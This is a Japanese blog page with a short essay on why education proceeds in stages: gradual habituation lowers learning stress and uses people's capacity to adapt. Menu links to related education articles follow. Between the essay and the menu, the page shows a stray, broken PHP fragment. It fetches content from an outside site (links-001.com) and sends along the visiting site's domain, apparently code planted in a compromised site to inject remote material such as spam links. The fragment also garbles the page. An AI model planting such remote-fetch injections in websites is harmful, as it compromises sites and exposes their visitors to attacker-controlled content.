教育を段階的に進める目的とは

 教育には、たいていの場合カリキュラムがあります。では、なぜカリキュラムを組むのでしょうか。 物事を身につけるということは、レベルにもよりますが、基本的な考えとして、物事を自分の中に定着させるということです。自分の中に定着されるには、一気にというわけにはいきません。得意なことならば、一気に、しかも何時間もぶっとおしで学習して身につけることも可能かもしれません。しかし、普通はそうはいきません。諦めずに、目標とするレベルまで物事を身につけるには、じょじょに自分を慣らしていく必要があります。慣らしていくことによって、学習のストレスが減っていくのです。そのストレスが減った分だけ、苦手な部分に取り組んだり、より多くの量を学習するのです。 段階的に学習するということは、自分を段階的に慣らすということです。何か新しい物事を取り込む時は、負担が掛かりますが、段階的に慣らすことによって、その新しい物事を身につけることに自分を適応させることができます。つまり段階的に物事を身につけるということは、人間の高い環境適応能力を活用するということです。 つまり、教育を段階的に進める目的とは、負担を軽減しつつ新しい物事を効率的かつ効果的に取り入れることなのです。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

MENU

更新情報

 絵を描くことは好きですか。好きな人も嫌いな人も、そしてどちらでもない人もいるかと思います。学生時代

絵を描くことを教育する目的

 みなさんは、作業を速くすることに特化して、教育を受けたことはありますか。ある人もない人もいると思い

速く作業することを教育する目的

子供に教育を受けさせるためには、やはり子供に目的意識を持って行なわせると勉強も経験も積極的に取り組ん

目的意識を持って教育を受けていく

 教育現場における問題の一つとして、教師の質が取り上げられる事があります。社会的な事件などが発生する

教育における問題は、指導者の資質にもあります

Copyright© 教育 目的 All Rights Reserved.

教育を段階的に進める目的とは